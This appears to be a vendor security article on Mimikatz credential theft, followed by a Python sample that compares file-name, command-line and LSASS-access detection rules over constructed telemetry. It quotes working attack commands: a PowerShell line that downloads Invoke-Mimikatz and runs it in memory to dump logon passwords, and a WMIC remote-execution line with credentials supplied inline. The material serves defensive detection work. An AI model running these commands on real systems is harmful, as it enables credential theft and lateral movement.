Defending yourself against this ubiquitous tool requires fresh thinking
Mimikatz is a popular (at least among criminal groups and rogue nation-states) open source credential access toolkit, used to pull credentials out of Windows memory and, with them, escalate privileges. Many in security will have heard of it, but there is a big threat here for those who have not, writes John Titmus, Director, EMEA, CrowdStrike. They may be at risk, or perhaps already suffering, from its near ubiquitous presence.
This is because, no matter the adversary, it is almost always present in Windows intrusions. It is not just a popular means of credential access: it is regularly seen in use by targeted adversaries and pen testers alike because of its utility and its effectiveness in bypassing signature-based detection.
We call it the AK47 because, whenever threat actors are seeking to gain access, this particular tool seems to crop up time and time again. Credit for first calling Mimikatz the "AK47 of cyber" goes to my boss and company founder Dmitri Alperovitch.
Threat actors often seek out valid credentials in order to escalate their privileges and extend their nefarious reach within an infrastructure – and they do so via a variety of means. The OverWatch team has observed cases in which adversaries have even employed multiple credential theft techniques against a single victim.
The Mimikatz usage we observe falls into four key techniques, each of which changes something a simple signature might key on:
- Changing the executable name
- Using a batch file
- Using a PowerShell variant
- Changing command line options
Let’s look at this in a little more detail.
1 – Sneak: Changing the executable name
The simplest and most direct technique is for the threat actor to copy the tool to a compromised system, change the name of the executable and launch it with, for example, the following command line:
This allows the actor to access credential information on the system. Renaming changes nothing about what the binary does: its internal strings and version information are untouched, and it still has to open the LSASS process to read credentials.
2 – Effective: Using a batch file
Other means of launching this tool that our team has observed in the wild include using a batch file to copy the tool over to target systems, launch it and send its output to a file, copy the output files back to a central collection point, and finally delete all relevant files from the target systems.
3 – Invoke the power: Using a PowerShell variant
Another means of gaining access to credential information that our analysts have observed is the use of a PowerShell variant of Mimikatz, downloaded and executed in memory without ever touching disk, as seen in the following example:
powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent[.]com/[REDACTED]/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit'
4 – Ch-ch changes: Changing command line options
During the last quarter of 2018, OverWatch analysts observed a different use of the Mimikatz tool, specifically one that appears to have been modified so that its command line options no longer match the stock module::command syntax (the tokens pr::dg sl::lp et appear to stand in for the usual privilege::debug sekurlsa::logonpasswords exit sequence). It appears as follows:
mnl.exe pr::dg sl::lp et -p
This specific variant of Mimikatz was run against multiple target systems remotely through WMIC.exe, with explicit credentials supplied on the command line and the output redirected to a file for later collection, as illustrated below:
Wmic /NODE:"[REDACTED]" /USER:"[REDACTED]" /password:[REDACTED] process call create "cmd.exe /c (c:\windows\security\mnl.exe pr::dg sl::lp et -p >c:\windows\security\PList.txt) >> c:\windows\temp\temp.txt"
A whole zoo of techniques: an all-encompassing approach is needed
This variety of effective tactics is a good reason to monitor for indicators of attack (IOAs). Each of these techniques is an attempt to evade brittle detection approaches that rely only on the command line options of the executable to infer its purpose, or on the presence of known strings in the binary file. A renamed binary, an in-memory PowerShell copy and a rebuilt binary with shortened options all defeat those checks, yet all three still have to perform the same action: read credential material out of LSASS.
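To make the contrast concrete, the following is an added example (not CrowdStrike's detection logic, and not code from the article) that runs three rules over constructed Sysmon-style telemetry modelled on the variants above: a file-name IOC, a command-line IOC keyed on the stock module::command syntax, and a behavioural IOA that fires when a process not on an allowlist opens lsass.exe with the PROCESS_VM_READ right. Hostnames, PIDs, paths, the download URL and the allowlist are invented; the event field names approximate Sysmon Event ID 1 (process create) and Event ID 10 (process access).

```python
"""
Command-line matching versus a behavioural indicator for Mimikatz variants.

Added example, not CrowdStrike code. The records below are constructed
Sysmon-style events (id 1 = process create, id 10 = process access) that
mirror the renamed-binary, PowerShell and modified-options variants in
the article. Hosts, PIDs, paths and the URL are invented.
"""
import re

PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory
LSASS = r"c:\windows\system32\lsass.exe"

# Hypothetical allowlist: processes that legitimately read LSASS on this estate.
LSASS_ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}

# Constructed sample telemetry (not real logs).
EVENTS = [
    # Variant 1: executable renamed, stock command line kept.
    {"id": 1, "host": "ws01", "pid": 4100,
     "image": r"C:\Users\Public\svchost32.exe", "original_file_name": "mimikatz.exe",
     "cmdline": 'svchost32.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"id": 10, "host": "ws01", "pid": 4100, "image": r"C:\Users\Public\svchost32.exe",
     "target": r"C:\Windows\System32\lsass.exe", "granted_access": 0x1010},
    # Variant 3: Invoke-Mimikatz reflectively loaded into PowerShell, nothing on disk.
    {"id": 1, "host": "ws02", "pid": 5200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original_file_name": "PowerShell.EXE",
     "cmdline": "powershell -ep Bypass -NoP -NonI -NoLogo -c IEX (New-Object Net.WebClient)"
                ".DownloadString('https://example.invalid/Invoke-Mimikatz.ps1');"
                "Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit'"},
    {"id": 10, "host": "ws02", "pid": 5200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Windows\System32\lsass.exe", "granted_access": 0x1FFFFF},
    # Variant 4: rebuilt binary with shortened module names (pr::dg sl::lp et).
    {"id": 1, "host": "ws03", "pid": 6300,
     "image": r"C:\Windows\security\mnl.exe", "original_file_name": "mnl.exe",
     "cmdline": r"c:\windows\security\mnl.exe pr::dg sl::lp et -p"},
    {"id": 10, "host": "ws03", "pid": 6300, "image": r"C:\Windows\security\mnl.exe",
     "target": r"C:\Windows\System32\lsass.exe", "granted_access": 0x1010},
    # Benign: a system process opening LSASS without PROCESS_VM_READ.
    {"id": 10, "host": "ws03", "pid": 600, "image": r"C:\Windows\System32\csrss.exe",
     "target": r"C:\Windows\System32\lsass.exe", "granted_access": 0x1400},
    # Benign: ordinary software that never touches LSASS.
    {"id": 1, "host": "ws03", "pid": 7000, "image": r"C:\Program Files\Backup\agent.exe",
     "original_file_name": "agent.exe", "cmdline": "agent.exe --schedule nightly"},
]


def ioc_filename(ev):
    """IOC: known tool name in the image path or the PE's OriginalFileName."""
    return ev["id"] == 1 and "mimikatz" in (ev["image"] + ev["original_file_name"]).lower()


# Stock Mimikatz module::command syntax; a rebuilt binary can rename these freely.
MIMIKATZ_CMD = re.compile(r"\b(privilege|sekurlsa|lsadump|kerberos|token)::\w+", re.I)


def ioc_cmdline(ev):
    """IOC: Mimikatz command syntax visible in the process command line."""
    return ev["id"] == 1 and MIMIKATZ_CMD.search(ev["cmdline"]) is not None


def ioa_lsass_read(ev):
    """IOA: a non-allowlisted process opens lsass.exe with read access to its memory."""
    if ev["id"] != 10 or ev["target"].lower() != LSASS:
        return False
    if not ev["granted_access"] & PROCESS_VM_READ:
        return False
    return ev["image"].lower() not in LSASS_ALLOWLIST


RULES = {"ioc_filename": ioc_filename, "ioc_cmdline": ioc_cmdline,
         "ioa_lsass_read": ioa_lsass_read}


def evaluate(events):
    """Return, per rule name, the set of (host, pid) pairs the rule fired on."""
    hits = {name: set() for name in RULES}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits[name].add((ev["host"], ev["pid"]))
    return hits


if __name__ == "__main__":
    for name, procs in evaluate(EVENTS).items():
        print(f"{name:15s} -> {sorted(procs)}")
```

Run as-is, the file-name rule catches only the renamed binary (its OriginalFileName still says mimikatz.exe), the command-line rule catches the renamed binary and the PowerShell variant but misses the rebuilt mnl.exe, and the LSASS-read rule catches all three while ignoring the benign accessor. In production the allowlist is the hard part: antivirus, EDR sensors and some backup agents also read LSASS, so the rule is usually paired with the parent process, signer and call-stack context rather than a bare image path.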
There are many techniques threat actors can employ to access credential information, so enterprises need a level of visibility that lets defenders see new techniques as they appear, even ones specifically designed to evade or subvert detection mechanisms.
Indicators of attack provide that visibility because they focus on the behavioural aspects of attacker techniques rather than on typical indicators of compromise (IOCs) such as file names, hashes or single command line options. An IOA detects what an attacker is trying to accomplish, regardless of the malware or exploit used, so a renamed, rebuilt or in-memory copy of a tool is still caught when it performs the same actions as the original.
An IOC is often described in the forensics world as evidence on a computer that indicates that the security of the network has been breached. Investigators usually gather this data after being informed of a suspicious incident, on a scheduled basis, or after the discovery of unusual call-outs from the network. Ideally, this information is gathered to create smarter tools that can detect and quarantine suspicious files in the future. Because IOCs provide a reactive method of tracking the “bad guys”, when you find an IOC, there is a high probability that you have already been compromised.
The behaviours that IOAs observe range from simple file I/O operations to privilege escalation, today's topic. Behavioural IOA correlation ties these together to detect and prevent malicious activity. The result is technology sophisticated enough to detect credential theft being carried out by a reflectively injected module in PowerShell, and to block it before the attacker ever sees the credentials.
Just like antivirus signatures, an IOC-based detection approach cannot detect the increasing threats from malware-free intrusions and zero-day exploits. As a result, enterprises are moving to an IOA-based approach to better suit their security requirements.